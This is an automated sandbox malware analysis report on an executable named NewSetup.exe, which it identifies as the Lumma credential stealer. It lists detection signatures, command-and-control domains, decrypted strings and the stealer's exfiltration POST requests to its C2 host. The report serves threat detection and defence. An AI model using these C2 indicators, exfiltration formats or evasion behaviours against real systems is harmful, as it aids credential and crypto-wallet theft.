Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NewSetup.exe

Overview

General Information

Sample name:NewSetup.exe
Analysis ID:1581500
MD5:e8c9377a0dddc131e2291c3d7f4d69ed
SHA1:c82b6d704cf41a98df3dd576a3a75093d89f0637
SHA256:4e88703d3aafd146935f551706c7691c36cb34efd05d874c8ea0d49933702446
Tags:exeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • NewSetup.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\NewSetup.exe" MD5: E8C9377A0DDDC131E2291C3D7F4D69ED)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NewSetup.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\NewSetup.exe" MD5: E8C9377A0DDDC131E2291C3D7F4D69ED)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "appliacnesot.buzz", "stingyerasjhru.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "pqZnKP--bW9vbnp6eG"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: NewSetup.exe PID: 5680JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: NewSetup.exe PID: 5680JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: NewSetup.exe PID: 5680JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T22:39:57.639998+010020283713Unknown Traffic192.168.2.649709172.67.157.249443TCP
              2024-12-27T22:39:59.643972+010020283713Unknown Traffic192.168.2.649710172.67.157.249443TCP
              2024-12-27T22:40:02.028641+010020283713Unknown Traffic192.168.2.649711172.67.157.249443TCP
              2024-12-27T22:40:04.493219+010020283713Unknown Traffic192.168.2.649713172.67.157.249443TCP
              2024-12-27T22:40:06.968159+010020283713Unknown Traffic192.168.2.649714172.67.157.249443TCP
              2024-12-27T22:40:09.559896+010020283713Unknown Traffic192.168.2.649724172.67.157.249443TCP
              2024-12-27T22:40:13.103475+010020283713Unknown Traffic192.168.2.649732172.67.157.249443TCP
              2024-12-27T22:40:16.063147+010020283713Unknown Traffic192.168.2.649743172.67.157.249443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T22:39:58.376516+010020546531A Network Trojan was detected192.168.2.649709172.67.157.249443TCP
              2024-12-27T22:40:00.414616+010020546531A Network Trojan was detected192.168.2.649710172.67.157.249443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T22:39:58.376516+010020498361A Network Trojan was detected192.168.2.649709172.67.157.249443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T22:40:00.414616+010020498121A Network Trojan was detected192.168.2.649710172.67.157.249443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T22:40:03.154379+010020480941Malware Command and Control Activity Detected192.168.2.649711172.67.157.249443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "appliacnesot.buzz", "stingyerasjhru.click", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "pqZnKP--bW9vbnp6eG"}
              Multi AV Scanner detection for submitted file
              Source: NewSetup.exeReversingLabs: Detection: 36%
              Machine Learning detection for sample
              Source: NewSetup.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: stingyerasjhru.click
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString decryptor: pqZnKP--bW9vbnp6eG
              Source: NewSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00231F38 FindFirstFileExW,0_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00231FE9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00231F38 FindFirstFileExW,3_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00231FE9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_0043F080
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]3_2_0043D929
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 4x nop then mov ecx, eax3_2_004269E0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49711 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.157.249:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: stingyerasjhru.click
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 172.67.157.249:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.157.249:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=POWTP03AGWE65AD7TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12858Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=849Y6J9LFXVPBSNM0JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HBDVBRQFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19908Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EI81MX42T8TGW0ASOT7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: stingyerasjhru.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EDIB75P7HSSY7A9WEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588331Host: stingyerasjhru.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: stingyerasjhru.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stingyerasjhru.click
              Source: NewSetup.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: NewSetup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: NewSetup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: NewSetup.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: NewSetup.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: NewSetup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: NewSetup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: NewSetup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: NewSetup.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: NewSetup.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: NewSetup.exeString found in binary or memory: http://ocsp.entrust.net02
              Source: NewSetup.exeString found in binary or memory: http://ocsp.entrust.net03
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: NewSetup.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: NewSetup.exeString found in binary or memory: http://www.entrust.net/rpa03
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&
              Source: NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: NewSetup.exe, 00000003.00000003.2240923981.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241770608.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2216181199.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215827974.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292228266.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317817416.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059F3000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243756050.0000000005A01000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240356091.0000000003467000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215760956.000000000346A000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2217240190.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275417498.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/
              Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/9
              Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/CTb
              Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/a
              Source: NewSetup.exe, 00000003.00000003.2318157969.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274098890.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/api
              Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/api5
              Source: NewSetup.exe, 00000003.00000003.2167294440.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/api:
              Source: NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiJa
              Source: NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiT
              Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apif#
              Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apil6
              Source: NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiok
              Source: NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/apiox
              Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/b
              Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241164394.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/bUT
